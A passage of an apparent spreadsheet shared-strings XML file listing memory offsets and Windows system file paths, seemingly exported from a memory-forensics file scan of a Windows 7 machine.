  </si>
  <si>
    <t>Instancing.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde666618</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsmediaplayerplaydvd_3aa04961f831b79d.cdf-</t>
  </si>
  <si>
    <t>0xde666860</t>
  </si>
  <si>
    <t>0xde666a38</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\slui.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde666f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_styles_pal_symphony_symphony_f1d008156719fefe.cdf</t>
  </si>
  <si>
    <t>-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde667038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\b64f2da9f589e34c7533b8639a9f</t>
  </si>
  <si>
    <t>327d\System.I</t>
  </si>
  <si>
    <t>on.Fil</t>
  </si>
  <si>
    <t>eSystem.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6671b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\Sy</t>
  </si>
  <si>
    <t>stem.ServiceM</t>
  </si>
  <si>
    <t>odel.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde667268</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP9D4B.tmp\System.Data.DataSetExtensions.dl</t>
  </si>
  <si>
    <t>0xde667730</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_cursors_bff8b8b245707919.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde667878</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\naphlpr\6.1.0.0__31bf3856ad364e35\NAPHLPR.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xde667e48</t>
  </si>
  <si>
    <t>ibbon.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde668038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\PresentationBuildTasks\3.0.0.0__31bf3856ad364e35\PresentationBuildT</t>
  </si>
  <si>
    <t>asks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6681b0</t>
  </si>
  <si>
    <t>0xde668268</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.Services\3.5.0.0__b77a5c561934e089\System.Data.Services</t>
  </si>
  <si>
    <t>0xde668320</t>
  </si>
  <si>
    <t>0xde6684f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_com_066545e3d047e7c7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde668678</t>
  </si>
  <si>
    <t>0xde668928</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_ugatherer_9f1f9c5b6cd50d98.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde668ab0</t>
  </si>
  <si>
    <t>0xde668c50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\unknown.inf_x86_neutral_aad5835b879ce7e4\unknown.</t>
  </si>
  <si>
    <t>0xde6693f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\certcli.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde669510</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr006.inf_x86_neutral_4eaab35acf775ef3\wiabr00</t>
  </si>
  <si>
    <t>6.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde669818</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_schemas_tsworkspace_8eac79c1e59127ee.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde669ae0</t>
  </si>
  <si>
    <t>0xde669b98</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AEE6E00145A67D60EDB2311F3E</t>
  </si>
  <si>
    <t>089D84_08C745</t>
  </si>
  <si>
    <t>C569DA2EEE7</t>
  </si>
  <si>
    <t>AF65FB</t>
  </si>
  <si>
    <t>E476B68E0_x001B_[0K</t>
  </si>
  <si>
    <t>0xde669d00</t>
  </si>
  <si>
    <t>0xde66a158</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_ugthrsvc_9c5b081f28f83f11.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66a578</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\trkwks.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66a990</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\hcproviders.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66aae0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\v_mscdsc.inf_x86_neutral_ef3a0c30c03f0225\V_MSCDS</t>
  </si>
  <si>
    <t>C.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66acc8</t>
  </si>
  <si>
    <t>0xde66b1e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\jscript.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66b360</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ole32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66b868</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ntdll.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66ba50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mswsock.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66c268</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcxpv3.inf_x86_neutral_fb18b60a7ae25b18\mdmcxpv</t>
  </si>
  <si>
    <t>0xde66c510</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\MSVidCtl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66c728</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_speech_engines_sr_en-us_3201cbb7cd315cd0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66c890</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sens.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66cb70</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP7A0A.tmp\System.WorkflowServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66d038</t>
  </si>
  <si>
    <t>0xde66d370</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_drivers_dc1b782427b5ee1b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66d4d8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msra.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66da50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_codeintegrity_e9af9308cfc26dc2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66dd40</t>
  </si>
  <si>
    <t>0xde66df80</t>
  </si>
  <si>
    <t>0xde66e208</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\scrawpdo.inf_x86_neutral_18f3d1cd9736f87d\scrawpd</t>
  </si>
  <si>
    <t>o.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66e688</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_nb-no_d8ffaee42c468adc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66e860</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_mcx_x02_7afb1a3b86c42e5e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66e918</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_mcx_022df17cf4546600.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66ed70</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_servicing_editions_596ea20ddafb9f7d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66eef0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_security_fe3ad40cd6e08c7c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66f1f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_remoteaccess_0409_86bc979ae65d5e96.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66f5b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsmediaplayermedialibrary_en-us_90086ff8e0</t>
  </si>
  <si>
    <t>9d3732.cdf-ms</t>
  </si>
  <si>
    <t>0xde66f740</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\sysglobl\2.0.0.0__b03f5f7f11d50a3a\sysglobl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde66f8e0</t>
  </si>
  <si>
    <t>0xde66fca8</t>
  </si>
  <si>
    <t>\Windows\System32\msacm32.drv_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6704f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsuprv.inf_x86_neutral_7d981ed202f564e1\mdmsupr</t>
  </si>
  <si>
    <t>v.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6706a8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_pt-br_d8b7861c2ce8d537.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde670760</t>
  </si>
  <si>
    <t>0xde670858</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_themes_aero_shell_normalcolor_10be8ec981b35fb6.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde670f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmhzel.inf_x86_neutral_d6658ac4c3567af0\mdmmhze</t>
  </si>
  <si>
    <t>l.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde671338</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\31acee518d481f258fb36180f8d9</t>
  </si>
  <si>
    <t>f741\Presenta</t>
  </si>
  <si>
    <t>tionFramewo</t>
  </si>
  <si>
    <t>rk-Sys</t>
  </si>
  <si>
    <t>temData.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6717f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_hu-hu_d9d7d7f62a602593.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde671aa0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\hidbth.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde671bf0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph6xib32c1.inf_x86_neutral_569a6f95e9320f9c\Ph6xI</t>
  </si>
  <si>
    <t>B32C1.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde672500</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\battc.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde672850</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\puiapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde672a00</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsupr3.inf_x86_neutral_dc84399e03fbfcd4\mdmsupr</t>
  </si>
  <si>
    <t>0xde672e48</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cdosys.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde673100</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_help_mui_0409_c7942094fabea651.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde673430</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_schcache_f995a5d4decb8cc0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde673618</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\596823cd0090826b1af9f5395f3dd458\WsatC</t>
  </si>
  <si>
    <t>onfig.ni.exe_x001B_</t>
  </si>
  <si>
    <t>0xde673708</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\PhotoScreensaver.scr.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde673ec8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Management.Instrumentation\3.5.0.0__b77a5c561934e089\System.</t>
  </si>
  <si>
    <t>Management.In</t>
  </si>
  <si>
    <t>strumentati</t>
  </si>
  <si>
    <t>on.dll</t>
  </si>
  <si>
    <t>0xde673f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.Services.Client\3.5.0.0__b77a5c561934e089\System.Data.S</t>
  </si>
  <si>
    <t>ervices.Clien</t>
  </si>
  <si>
    <t>t.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde674218</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_ed3f8f2e7a4426af.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6742d0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.DirectoryServices.AccountManagement\3.5.0.0__b77a5c561934e08</t>
  </si>
  <si>
    <t>9\System.Dire</t>
  </si>
  <si>
    <t>ctoryServic</t>
  </si>
  <si>
    <t>es.Acc</t>
  </si>
  <si>
    <t>ountManagement.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde674450</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx</t>
  </si>
  <si>
    <t>0xde674638</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_driverstore_en-us_f6b4aaeeda14a371.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6747b8</t>
  </si>
  <si>
    <t>0xde674870</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.AddIn\8424f984ff5b6c2615c3_x001B_[0K</t>
  </si>
  <si>
    <t>0xde674928</t>
  </si>
  <si>
    <t>0xde6749e0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\3.5.0.0__31bf3856ad364e35\Sys</t>
  </si>
  <si>
    <t>tem.Component</t>
  </si>
  <si>
    <t>Model.DataA</t>
  </si>
  <si>
    <t>nnotat</t>
  </si>
  <si>
    <t>ions.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde674a98</t>
  </si>
  <si>
    <t>0xde674d80</t>
  </si>
  <si>
    <t>0xde6752b8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\197d0f1faea7052db6eb7de710e1</t>
  </si>
  <si>
    <t>b3b1\System.S</t>
  </si>
  <si>
    <t>erviceModel</t>
  </si>
  <si>
    <t>.Activ</t>
  </si>
  <si>
    <t>ation.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6754d0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\radarrs.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde675740</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wecsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde675a50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ikeext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde675b08</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnin004.inf_x86_neutral_2aba7beb4ab9a9e8\prnin00</t>
  </si>
  <si>
    <t>0xde675f80</t>
  </si>
  <si>
    <t>\Windows\System32\msmpeg2vdec.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6763a0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP43F0.tmp\System.Data.Services.Client.dll_x001B_</t>
  </si>
  <si>
    <t>0xde676590</t>
  </si>
  <si>
    <t>0xde676648</t>
  </si>
  <si>
    <t>0xde676700</t>
  </si>
  <si>
    <t>0xde6767b8</t>
  </si>
  <si>
    <t>0xde676998</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\SrpUxSnapIn\bfaf5e19a794e3359ff1_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6775e0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_enterprise_1f6aff8483fc8d55.cdf-ms</t>
  </si>
  <si>
    <t>0xde6778a8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmati.inf_x86_neutral_96d3e2f4c2326f0b\mdmati.in</t>
  </si>
  <si>
    <t>0xde677b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_enterprisen_758c84d30065b56d.cdf-m</t>
  </si>
  <si>
    <t>0xde677e68</t>
  </si>
  <si>
    <t>\Windows\System32\catsrvut.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde678a20</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde678c28</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_83386eac0379231b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde678e60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\tape.inf_x86_neutral_2ad11993c0ac6624\tape.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xde678f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_servicing_version_6.1.7601.23505_a118097b0a3ef240.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde679038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_performance_en-us_0e192682c5b12037.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde679268</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6798f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\DocumentPerformanceEvents.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67a408</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_enterprise_0a9aa7d44eee0b7f.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde67a7f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_enterprisen_1d6f5a63fa30e7f7.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde67ab70</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_enterprisee_1d6f5a51fa30e848.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde67ae60</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_performance_d48bf95b5c828123.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67af80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\ba8e97848dcf5870e541b8ce6560</t>
  </si>
  <si>
    <t>5e21\System.W</t>
  </si>
  <si>
    <t>eb.DataVisu</t>
  </si>
  <si>
    <t>alizat</t>
  </si>
  <si>
    <t>ion.Design.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67b5f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\757a2c3f743dfe751eb331efd995</t>
  </si>
  <si>
    <t>5057\System.D</t>
  </si>
  <si>
    <t>ata.DataSet</t>
  </si>
  <si>
    <t>Extens</t>
  </si>
  <si>
    <t>ions.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67b868</t>
  </si>
  <si>
    <t>0xde67bf80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_ru-ru_d86f925a2d8ad06f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67c448</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pdh.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67c630</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\srvsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67c810</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\rdvgwddm.inf_x86_neutral_345f205da00aaad5\rdvgwdd</t>
  </si>
  <si>
    <t>0xde67cc38</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mtconfig.inf_x86_neutral_4de24f49b5e60c45\mtconfi</t>
  </si>
  <si>
    <t>g.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67ce08</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\2f8eca3fa378054af4340d4a8b8d</t>
  </si>
  <si>
    <t>42ef\System.C</t>
  </si>
  <si>
    <t>omponentMod</t>
  </si>
  <si>
    <t>el.Com</t>
  </si>
  <si>
    <t>position.Registration.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67cf80</t>
  </si>
  <si>
    <t>Visualization.Design.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67d038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\2e07ecad2766063345c79a7d3476</t>
  </si>
  <si>
    <t>73cf\System.W</t>
  </si>
  <si>
    <t>ion.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67d468</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\66a9564c7eee80ae7b8ebd2facfacebd</t>
  </si>
  <si>
    <t>\System.Messa</t>
  </si>
  <si>
    <t>ging.ni.dll</t>
  </si>
  <si>
    <t>.aux_x001B_[</t>
  </si>
  <si>
    <t>0xde67d930</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\MSWMDM.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67dc20</t>
  </si>
  <si>
    <t>\Windows\System32\stobject.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67de68</t>
  </si>
  <si>
    <t>0xde67e4b8</t>
  </si>
  <si>
    <t>\Windows\System32\fltLib.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67eab0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\WsatConfig\1787226c5efa3856bcd2_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67f608</t>
  </si>
  <si>
    <t>esentation.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67f9b0</t>
  </si>
  <si>
    <t>0xde67fa90</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_esent_0409_5aeb87034bde57c9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde67fd68</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmpace.inf_x86_neutral_f5caca1789a3c28b\mdmpace.</t>
  </si>
  <si>
    <t>0xde67ff80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_drivers_etc_a531967eb3dfecbd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde680368</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\dsound.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6805e8</t>
  </si>
  <si>
    <t>0xde6806a0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde680758</t>
  </si>
  <si>
    <t>0xde6809c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\124e5c755e76dd735c6770907982</t>
  </si>
  <si>
    <t>b844\System.N</t>
  </si>
  <si>
    <t>et.Http.Web</t>
  </si>
  <si>
    <t>Reques</t>
  </si>
  <si>
    <t>t.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde680b08</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_nl-nl_d8ffaf642c46898f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde681038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\DfrgUI.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde681120</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\w32time.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde681300</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\tsusbhub.inf_x86_neutral_927afe150d9ff343\tsusbhu</t>
  </si>
  <si>
    <t>b.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde681580</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Activation\v4.0_4.0.0.0__31bf3856</t>
  </si>
  <si>
    <t>em.ServiceM</t>
  </si>
  <si>
    <t>odel.A</t>
  </si>
  <si>
    <t>ctivation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde681738</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msacm32.drv.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde681a50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ieframe.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde681c98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmirmdm.inf_x86_neutral_b64ae6e8f8db8514\mdmirmd</t>
  </si>
  <si>
    <t>0xde681f18</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\fdrespub.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde682038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\6d23a04f16ec12eb35dab864e649</t>
  </si>
  <si>
    <t>ee8a\System.W</t>
  </si>
  <si>
    <t>orkflow.Run</t>
  </si>
  <si>
    <t>time.n</t>
  </si>
  <si>
    <t>i.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde682450</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Bubbles.scr.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde682838</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\infstor.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6829e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\apphelp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde682d60</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\scansetting.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde683318</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\aclui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde683498</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\polstore.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde683aa0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\eqossnap.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde683bf0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaep003.inf_x86_neutral_eef30f8de263d9ad\wiaep00</t>
  </si>
  <si>
    <t>0xde683e08</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\b750229ac4a47aabe492a7e823d013df\Sy</t>
  </si>
  <si>
    <t>stem.IO.Log.n</t>
  </si>
  <si>
    <t>0xde683ec8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\RAC\StateData\RacWmiEventData.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xde683f80</t>
  </si>
  <si>
    <t>0xde684698</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\CertEnroll.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde684918</t>
  </si>
  <si>
    <t>0xde684ab0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\bth.inf_x86_neutral_a6bf6d613b46f6a5\bth.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde684bd0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\19e68f77e21e96e53e05dc39ba6a</t>
  </si>
  <si>
    <t>b7b4\Presenta</t>
  </si>
  <si>
    <t>temCore.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde684df0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mssphtb.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde684f80</t>
  </si>
  <si>
    <t>0xde6851e8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\seclogon.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde685398</t>
  </si>
  <si>
